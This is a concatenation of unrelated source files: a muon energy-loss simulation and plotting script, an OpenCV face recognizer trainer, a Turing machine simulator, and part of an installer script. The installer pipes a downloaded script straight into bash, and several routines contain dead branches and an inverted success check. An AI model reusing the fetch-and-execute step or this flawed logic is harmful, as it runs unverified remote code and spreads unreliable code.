self._current_pac_block = block
if self._current_pac_state is "c":
self._current_pac_state = "C"
else:
self._current_pac_state = "c"
else:
pass
self._bar[block] = '\033[1m' + "\033[93m" + \
self._current_pac_state + '\033[0m'
self._bar[:block] = block * [self._bar_full]
else:
block = int(self._bar_lenght * progress)
self._bar[:block] = block * [self._bar_full]
text = self._text.format(
"".join(self._bar),
progress*100,
str(datetime.timedelta(seconds=(time.time() - self._start_time))),
int(self._current_loop),
self._loops,
self._status
)
sys.stdout.write(text)
sys.stdout.flush()
def propagate_muons():
mu_def = pp.particle.MuMinusDef.get()
geometry = pp.geometry.Sphere(pp.Vector3D(), 1.e20, 0.0)
ecut = 500
vcut = -1
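    # EnergyCutSettings(ecut, vcut): ecut is an absolute cut in MeV; a negative
    # vcut disables the relative cut (assumption based on PROPOSAL's conventions).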
sector_def = pp.SectorDefinition()
sector_def.cut_settings = pp.EnergyCutSettings(ecut, vcut)
sector_def.medium = pp.medium.Ice(1.0)
sector_def.geometry = geometry
sector_def.scattering_model = pp.scattering.ScatteringModel.NoScattering
sector_def.crosssection_defs.brems_def.lpm_effect = True
sector_def.crosssection_defs.epair_def.lpm_effect = True
detector = geometry
interpolation_def = pp.InterpolationDef()
interpolation_def.path_to_tables = "tables/"
#initialize propagator without mupairproduction
prop_nomupair = pp.Propagator(mu_def, [sector_def], detector, interpolation_def)
#initialize propagator with mupairproduction
sector_def.crosssection_defs.mupair_def.parametrization = pp.parametrization.mupairproduction.MupairParametrization.KelnerKokoulinPetrukhin
sector_def.crosssection_defs.mupair_def.particle_output = False
prop = pp.Propagator(mu_def, [sector_def], detector, interpolation_def)
# for rho sampling
param_defs_mupair = [mu_def, sector_def.medium, sector_def.cut_settings, 1.0, True, interpolation_def]
param_mupair = pp.parametrization.mupairproduction.KelnerKokoulinPetrukhinInterpolant(*param_defs_mupair)
statistics_log = 5
statistics = int(10**statistics_log)
propagation_length = 1e20 # cm
E_log = 8.0
pp.RandomGenerator.get().set_seed(1234)
### PRIMARY MUON PROPAGATION ###
muon_energies = np.ones(statistics)*10**E_log
epair_secondary_energy = []
brems_secondary_energy = []
ioniz_secondary_energy = []
photo_secondary_energy = []
mpair_secondary_energy = []
mpair_primary_energy = []
print("Propagate primary muons...")
progress = ProgressBar(statistics, pacman=True)
progress.start()
for mu_energy in muon_energies:
progress.update()
prop.particle.position = pp.Vector3D(0, 0, 0)
prop.particle.direction = pp.Vector3D(0, 0, -1)
prop.particle.propagated_distance = 0
prop.particle.energy = mu_energy
secondarys = prop.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
mpair_secondary_energy.append(sec_energy)
mpair_primary_energy.append(sec.parent_particle_energy)
#statistics:
num_all = len(brems_secondary_energy) + len(epair_secondary_energy) + len(photo_secondary_energy) + len(ioniz_secondary_energy) + len(mpair_secondary_energy)
ene_all = sum(brems_secondary_energy) + sum(epair_secondary_energy) + sum(photo_secondary_energy) + sum(ioniz_secondary_energy) + sum(mpair_secondary_energy)
print("Number:")
print("Brems: ", len(brems_secondary_energy), len(brems_secondary_energy)/num_all)
print("Epair: ", len(epair_secondary_energy), len(epair_secondary_energy)/num_all)
print("photo: ", len(photo_secondary_energy), len(photo_secondary_energy)/num_all)
print("Ioniz: ", len(ioniz_secondary_energy), len(ioniz_secondary_energy)/num_all)
print("MPair: ", len(mpair_secondary_energy), len(mpair_secondary_energy)/num_all)
print("Energies:")
print("Brems ", sum(brems_secondary_energy), sum(brems_secondary_energy)/ene_all)
print("Epair: ", sum(epair_secondary_energy), sum(epair_secondary_energy)/ene_all)
print("photo: ", sum(photo_secondary_energy), sum(photo_secondary_energy)/ene_all)
print("Ioniz: ", sum(ioniz_secondary_energy), sum(ioniz_secondary_energy)/ene_all)
print("MPair: ", sum(mpair_secondary_energy), sum(mpair_secondary_energy)/ene_all)
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy,brems_secondary_energy,photo_secondary_energy,epair_secondary_energy,mpair_secondary_energy)))), E_log, 100)
ax_all = fig_all.add_subplot(111)
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy,
np.concatenate((
ioniz_secondary_energy,
brems_secondary_energy,
photo_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy)
)
],
histtype='step',
log=True,
bins=x_space,
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', r'$\mu$ pair production', 'Sum'],
color = ['C3', 'C2', 'C1', 'C0', 'C4', 'C7'],
zorder = 3
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair.pdf",bbox_inches='tight')
plt.clf()
epair_old = epair_secondary_energy
brems_old = brems_secondary_energy
ioniz_old = ioniz_secondary_energy
photo_old = photo_secondary_energy
mpair_old = mpair_secondary_energy
### SECONDARY MUON PROPAGATION ###
secondary_muon_energy = []
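    # Split the pair energy nu between the two muons via the sampled asymmetry rho:
    # E1 = 0.5*nu*(1+rho), E2 = 0.5*nu*(1-rho), so that E1 + E2 = nu.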
for E, nu in zip(mpair_primary_energy, mpair_secondary_energy):
rho = param_mupair.Calculaterho(E, nu/E, np.random.rand(), np.random.rand())
secondary_muon_energy.append( 0.5 * nu * (1. + rho) )
secondary_muon_energy.append( 0.5 * nu * (1. - rho) )
epair_secondary_energy = []
brems_secondary_energy = []
ioniz_secondary_energy = []
photo_secondary_energy = []
mpair_secondary_energy = []
print("Propagate secondary muons...")
progress = ProgressBar(len(secondary_muon_energy), pacman=True)
progress.start()
for mu_energy in secondary_muon_energy:
progress.update()
prop.particle.position = pp.Vector3D(0, 0, 0)
prop.particle.direction = pp.Vector3D(0, 0, -1)
prop.particle.propagated_distance = 0
prop.particle.energy = mu_energy
secondarys = prop.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
mpair_secondary_energy.append(sec_energy)
print("Number:")
print("Brems: ", len(brems_secondary_energy), len(brems_secondary_energy)/num_all)
print("Epair: ", len(epair_secondary_energy), len(epair_secondary_energy)/num_all)
print("photo: ", len(photo_secondary_energy), len(photo_secondary_energy)/num_all)
print("Ioniz: ", len(ioniz_secondary_energy), len(ioniz_secondary_energy)/num_all)
print("MPair: ", len(mpair_secondary_energy), len(mpair_secondary_energy)/num_all)
print("Energies:")
print("Brems ", sum(brems_secondary_energy), sum(brems_secondary_energy)/ene_all)
print("Epair: ", sum(epair_secondary_energy), sum(epair_secondary_energy)/ene_all)
print("photo: ", sum(photo_secondary_energy), sum(photo_secondary_energy)/ene_all)
print("Ioniz: ", sum(ioniz_secondary_energy), sum(ioniz_secondary_energy)/ene_all)
print("MPair: ", sum(mpair_secondary_energy), sum(mpair_secondary_energy)/ene_all)
### PROPAGATION WITHOUT MUPAIRPRODUCTION
muon_energies = np.ones(statistics)*10**E_log
epair_secondary_energy_nomupair = []
brems_secondary_energy_nomupair = []
ioniz_secondary_energy_nomupair = []
photo_secondary_energy_nomupair = []
print("Propagate muons without MuPairProduction...")
progress = ProgressBar(statistics, pacman=True)
progress.start()
for mu_energy in muon_energies:
progress.update()
prop_nomupair.particle.position = pp.Vector3D(0, 0, 0)
prop_nomupair.particle.direction = pp.Vector3D(0, 0, -1)
prop_nomupair.particle.propagated_distance = 0
prop_nomupair.particle.energy = mu_energy
secondarys = prop_nomupair.propagate(propagation_length)
for sec in secondarys:
sec_energy = sec.energy
if sec.id == pp.particle.Data.Epair:
epair_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.Brems:
brems_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.DeltaE:
ioniz_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.NuclInt:
photo_secondary_energy_nomupair.append(sec_energy)
elif sec.id == pp.particle.Data.MuPair:
print("Something went wrong")
# Comparison plot
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
gs = matplotlib.gridspec.GridSpec(2, 1, height_ratios=[4, 1], hspace=0.1)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy_nomupair,photo_secondary_energy_nomupair,brems_secondary_energy_nomupair,epair_secondary_energy_nomupair)))), E_log, 100)
ax_all = fig_all.add_subplot(gs[0])
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy
],
histtype='step',
color = ['C3', 'C2', 'C1', 'C0', 'C4'],
log=True,
bins=x_space,
zorder = 3,
linestyle = 'dashed',
)
ax_all.hist(
[
ioniz_secondary_energy_nomupair,
photo_secondary_energy_nomupair,
brems_secondary_energy_nomupair,
epair_secondary_energy_nomupair,
np.concatenate((
ioniz_secondary_energy_nomupair,
brems_secondary_energy_nomupair,
photo_secondary_energy_nomupair,
epair_secondary_energy_nomupair)
)
],
color = ['C3', 'C2', 'C1', 'C0', 'C7'],
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', 'Sum'],
histtype='step',
log=True,
bins=x_space,
zorder = 4,
)
ax_all.hist(
[
np.array([0])
],
color = ['C4'],
label=[r'$\mu$ pair production'],
histtype='step',
log=True,
bins=x_space,
zorder = 0,
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
plt.setp(ax_all.get_xticklabels(), visible=False)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False
) # labels along the bottom edge are off
ax_all = fig_all.add_subplot(gs[1], sharex=ax_all)
hist_1, bin_edges_1 = np.histogram(np.concatenate((ioniz_secondary_energy_nomupair,brems_secondary_energy_nomupair,photo_secondary_energy_nomupair,epair_secondary_energy_nomupair)),
bins = x_space)
hist_2, bin_edges_2 = np.histogram(np.concatenate((epair_old, ioniz_old, brems_old, photo_old, ioniz_secondary_energy,photo_secondary_energy,brems_secondary_energy,epair_secondary_energy,mpair_secondary_energy)),
bins = x_space)
print(np.shape(x_space))
print(np.shape(hist_1))
ax_all.step(x_space[1:], hist_1/hist_2, where='pre', color='C4')
#ax_all.bar(x_space[:-1], hist_1/hist_2, width=np.diff(x_space), align='edge', fill=False)
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'ratio')
plt.ylim(0.9, 1.1)
plt.grid(grid_conf)
    ax_all.axhline(y=1, linewidth=0.5, zorder=0, color='C7')
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair_secondary_comparison.pdf",bbox_inches='tight')
plt.clf()
# Plot particles from secondary spectrum
plt.rcParams.update(params)
fig_all = plt.figure(
figsize=(width, 4)
)
x_space = np.logspace(min(np.log10(np.concatenate((ioniz_secondary_energy,brems_secondary_energy,photo_secondary_energy,epair_secondary_energy,mpair_secondary_energy)))), E_log, 100)
ax_all = fig_all.add_subplot(111)
ax_all.hist(
[
ioniz_secondary_energy,
photo_secondary_energy,
brems_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy,
np.concatenate((
ioniz_secondary_energy,
brems_secondary_energy,
photo_secondary_energy,
epair_secondary_energy,
mpair_secondary_energy)
)
],
histtype='step',
log=True,
bins=x_space,
label=['Ionization', 'Photonuclear', 'Bremsstrahlung', r'$e$ pair production', r'$\mu$ pair production', 'Sum'],
color = ['C3', 'C2', 'C1', 'C0', 'C4', 'C7'],
zorder = 3
)
plt.xscale('log')
#minor_locator = AutoMinorLocator()
#ax_all.xaxis.set_minor_locator(minor_locator)
ax_all.legend(loc='best')
ax_all.set_xlabel(r'$ E \cdot v \,/\, \mathrm{MeV} $')
ax_all.set_ylabel(r'Frequency')
#plt.xlim(left=2.5)
plt.grid(grid_conf)
fig_all.tight_layout()
fig_all.savefig("build/spectrum_mupair_secondary.pdf",bbox_inches='tight')
plt.clf()
if __name__ == "__main__":
propagate_muons()
```
|
{
"source": "Jean1dev/Reconhecimento-Facil-",
"score": 3
}
|
#### File: python/testes yale/treinamento-yale.py
```python
import cv2
import os
import numpy as np
from PIL import Image
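# Positional arguments of the OpenCV face recognizers: Eigen/Fisher take
# (num_components, threshold); LBPH takes (radius, neighbors, grid_x, grid_y, threshold).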
eigenface = cv2.face.EigenFaceRecognizer_create(40, 8000)
fisherface = cv2.face.FisherFaceRecognizer_create(3, 2000)
lbph = cv2.face.LBPHFaceRecognizer_create(2, 2, 7, 7, 50)
def getImagemComId():
caminhos = [os.path.join('yalefaces/treinamento', f) for f in os.listdir('yalefaces/treinamento')]
faces = []
ids = []
for caminhoImagem in caminhos:
imagemFace = Image.open(caminhoImagem).convert('L')
imagemNP = np.array(imagemFace, 'uint8')
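        # Yale filenames follow the pattern "subjectNN.<expression>", so the
        # numeric id is recovered by stripping the prefix and extension below.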
id = int(os.path.split(caminhoImagem)[1].split(".")[0].replace("subject", ""))
ids.append(id)
faces.append(imagemNP)
return np.array(ids), faces
ids, faces = getImagemComId()
print("Treinando...")
eigenface.train(faces, ids)
eigenface.write('classificadorEigenYale.yml')
fisherface.train(faces, ids)
fisherface.write('classificadorFisherYale.yml')
lbph.train(faces, ids)
lbph.write('classificadorLBPHYale.yml')
print("Treinamento realizado")
```
|
{
"source": "Jean1dev/Turing-Machine",
"score": 4
}
|
#### File: Jean1dev/Turing-Machine/Turing.py
```python
import os
class TuringMachine:
def __init__(self):
print(self)
@staticmethod
def getInputData():
return input("\n\t\t\t\t\t Digite o Numero : ")
# ***********************************************************************
def divisao(self):
# ***********************************************************************
numero1 = int(self.getInputData())
numero2 = int(self.getInputData())
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
ret.append('_')
for item in range(int(numero1 / numero2)):
ret.append('_')
ret.append('_')
for item in range(numero1 % numero2):
ret.append('_')
estado = -1
pos = 0
while (estado != 21):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
else:
estado = 2
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos -= 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
estado = 10
pos += 1
elif (estado == 5):
if (ret[pos] == '*'):
pos -= 1
elif (ret[pos] == '$'):
estado = 6
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '*'):
estado = 7
ret[pos] = '$'
pos += 1
else:
estado = 12
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 8
pos += 1
elif (estado == 8):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 3
pos -= 1
else:
estado = 3
pos -= 1
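            # NOTE: no transition assigns estado = 9 in this method, so the branch below is dead code.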
elif (estado == 9):
if (ret[pos] == '_'):
estado = 10
pos += 1
elif (estado == 10):
if (ret[pos] == '$'):
estado = 10
ret[pos] = '*'
pos += 1
else:
estado = 11
pos += 1
elif (estado == 11):
if (ret[pos] == '*'):
pos += 1
else:
estado = 5
ret[pos] = '*'
pos -= 1
elif (estado == 12):
if (ret[pos] == '*'):
pos += 1
elif (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 13):
if (ret[pos] == '$'):
pos += 1
else:
estado = 14
pos += 1
elif (estado == 14):
if (ret[pos] == '*'):
pos += 1
else:
estado = 15
pos += 1
elif (estado == 15):
if (ret[pos] == '*'):
pos += 1
else:
estado = 16
ret[pos] = '*'
pos -= 1
elif (estado == 16):
if (ret[pos] == '>'):
estado = 18
pos -= 1
elif (ret[pos] == '$'):
estado = 17
pos -= 1
else:
pos -= 1
elif (estado == 17):
if (ret[pos] == '*'):
estado = 18
pos += 1
else:
pos -= 1
elif (estado == 18):
if (ret[pos] == '$'):
estado = 19
ret[pos] = '*'
pos += 1
elif (estado == 19):
if (ret[pos] == '$'):
estado = 13
pos += 1
else:
estado = 20
ret[pos] = '>'
pos -= 1
elif (estado == 20):
if (ret[pos] == '>'):
estado = 21
ret[pos] = '_'
pos += 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
p = 0
for item in range(len(ret)):
if (ret[item] == '>'):
break
p += 1
for item in range(p):
ret.remove('_')
print('Fim do procedimento ')
print(''.join(ret))
# ***********************************************************************
def igualar(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
numero1 = int(numero1)
numero2 = int(numero2)
ret = ['>']
for item in range(numero1):
ret.append('*')
ret.append('_')
for item in range(numero2):
ret.append('*')
if (numero2 != 0):
for item in range(numero1 - numero2 + 1):
ret.append('_')
else:
for item in range(numero1):
ret.append('_')
ret.append('_')
estado = -1
pos = 0
while (estado != 9):
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0}'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
if (estado == -1):
pos += 1
estado += 1
elif (estado == 0):
if ret[pos] == '*':
estado = 1
ret[pos] = '$'
pos += 1
else:
estado = 7
                    pos += 1
elif (estado == 1):
if (ret[pos] == '*'):
pos += 1
                    estado = 2
else:
estado = 6
pos += 1
elif (estado == 2):
if (ret[pos] == '*'):
pos += 1
else:
estado = 3
pos += 1
elif (estado == 3):
if (ret[pos] == '*'):
estado = 4
ret[pos] = '$'
pos -= 1
                elif (ret[pos] == '$'):
pos += 1
else:
estado = 4
ret[pos] = '$'
pos -= 1
elif (estado == 4):
if (ret[pos] == '*'):
estado = 5
pos -= 1
else:
pos -= 1
elif (estado == 5):
if (ret[pos] == '$'):
estado = 0
pos += 1
else:
pos -= 1
elif (estado == 6):
if (ret[pos] == '$'):
pos += 1
else:
estado = 7
ret[pos] = '$'
pos += 1
elif (estado == 7):
if (ret[pos] == '*'):
pos += 1
else:
estado = 8
pos -= 1
elif (estado == 8):
if (ret[pos] == '>'):
estado = 9
pos += 1
elif (ret[pos] == '$'):
ret[pos] = '*'
pos -= 1
else:
ret[pos] = '_'
pos -= 1
marc = []
for i in range(pos):
marc.append(' ')
marc.append('|')
auxmarc = ''.join(marc)
print('{0} \n'.format(auxmarc))
aux = ''.join(ret)
print('{0} \n'.format(aux))
print(''.join(ret))
# ***********************************************************************
def soma(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
i = 0
for i in range(int(numero1)):
operador1 += "*"
i = 0
for i in range(int(numero2)):
operador2 += "*"
res = operador1 + " " + operador2 + ""
# os.system("cls")
print("\n\t\t________________________SOMA_______________________")
print("Valores: " + res)
res = list(res)
estado = "q0"
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
i = 0
# for i in range(len(res)):
for i, item in enumerate(res):
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q0")
print("\n")
continue
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
res[i] = "*"
estado = "q1"
continue
elif res[i] == "*" and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
continue
elif res[i] == " " and estado == "q1":
print("\tq1\t "+res[i]+"\t "+str(i) +
"\t "+" \t E \t\t q2")
print("\n")
res[i - 1] = " "
estado = "q2"
print("\tq2\t "+res[i]+"\t "+str(i - 1) +
"\t "+" \t FIM \t\t q2")
break
print("\n")
print("\n")
result = ''.join(res)
print("Resultado: " + result)
# **********************************************************************
def multiplicacao(self):
# **********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
        for _ in range(int(numero1)):
            operador1 += "*"
        for _ in range(int(numero2)):
            operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t_____________________MULTIPLICACAO______________________________")
print("\n")
print("Valores : " + res)
res = list(res)
estado = "q0"
i = 0
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
estado = "q10"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
estado = "q2"
i += 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
i -= 1
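            # NOTE: the next branch repeats the condition above and can never fire as written.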
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q3")
print("\n")
estado = "q3"
i -= 1
elif res[i] == "B" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q2")
print("\n")
i += 1
elif res[i] == "*" and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == " " and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q5")
print("\n")
estado = "q5"
i += 1
elif res[i] == "B" and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
i += 1
elif res[i] == "*" and estado == "q5":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q5")
print("\n")
i += 1
elif res[i] == " " and estado == "q5":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q6")
print("\n")
estado = "q6"
i -= 1
elif res[i] == '*' and estado == "q6":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q6")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q6":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q7")
print("\n")
estado = "q7"
i -= 1
elif res[i] == '*' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == ' ' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q8")
print("\n")
estado = "q8"
i += 1
elif res[i] == 'B' and estado == "q7":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
estado = "q9"
i -= 1
elif res[i] == ' ' and estado == "q8":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
estado = "q9"
i -= 1
elif res[i] == 'B' and estado == "q8":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q8")
print("\n")
i += 1
elif res[i] == '*' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q9")
print("\n")
i += 1
elif res[i] == 'A' and estado == "q9":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q0")
print("\n")
estado = "q0"
i += 1
elif res[i] == '*' and estado == "q10":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
i += 1
elif res[i] == ' ' and estado == "q10":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
estado = "q11"
i -= 1
elif res[i] == '*' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif res[i] == ' ' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif res[i] == 'A' and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q11")
print("\n")
i -= 1
elif i < 0 and estado == "q11":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
estado = "q1"
i += 1
print('\n')
print('\n')
result = ''.join(res)
print("Resultado " + result )
# ***********************************************************************
def subtracao(self):
# ***********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
        for _ in range(int(numero1)):
            operador1 += "*"
        for _ in range(int(numero2)):
            operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t________________________SUBTRACAO________________________________")
print("Valores " + res)
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
estado = "q0"
res = list(res)
i = 0
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q0")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q1")
print("\n")
estado = "q1"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q2")
print("\n")
res[i] = " "
estado = "q2"
i -= 1
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
res[i] = " "
estado = "q3"
i -= 1
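            # NOTE: the next branch repeats the condition above and can never fire as written.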
elif res[i] == "*" and estado == "q2":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q2")
print("\n")
break
elif res[i] == "*" and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
i -= 1
elif res[i] == " " and estado == "q3":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q3")
print("\n")
i -= 1
elif i < 0:
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q4")
print("\n")
estado = "q4"
i += 1
elif res[i] == "*" and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q0")
print("\n")
res[i] = " "
estado = "q0"
i += 1
elif res[i] == " " and estado == "q4":
print("\tq0\t "+res[i]+"\t "+str(i)+"\t * "+" \t D \t\t q4")
print("\n")
res[i] = " "
estado = "q4"
i += 1
print('\n')
print('\n')
result = ''.join(res)
print("Resultado " + result )
#a = TuringMachine()
# a.soma()
#a.subtracao()
#a.multiplicacao()
```
|
{
"source": "jean3108/labandco",
"score": 3
}
|
#### File: jean3108/labandco/install.py
```python
import os
import sys
from pathlib import Path
APP_NAME = "Lab&Co"
PYTHON_VERSION = "3.9.2"
def run(cmd):
print(f"> {cmd}")
status = os.system(cmd)
print(f"status = {status}")
return status
print(f"Going to install {APP_NAME}")
print("Press Y to confirm")
answ = input()
if answ.lower() != "y":
sys.exit()
pyenv_root = Path(os.environ["HOME"]) / ".pyenv"
if not pyenv_root.exists():
print("Installing pyenv")
if not run("curl https://pyenv.run | bash"):
print("! Ensure that you have 'curl' installed")
sys.exit()
else:
print("Pyenv seems to be alredy installed.")
print()
if not (pyenv_root / "versions" / PYTHON_VERSION).exists():
print(f"Installing Python {PYTHON_VERSION}")
if not run(f"pyenv install {PYTHON_VERSION}"):
print(f"! Couldn't install Python version {PYTHON_VERSION}")
sys.exit()
else:
print(f"Python {PYTHON_VERSION} seems to be alredy installed. Skipping.")
print()
if not Path("env").exists():
print("Creating virtual env")
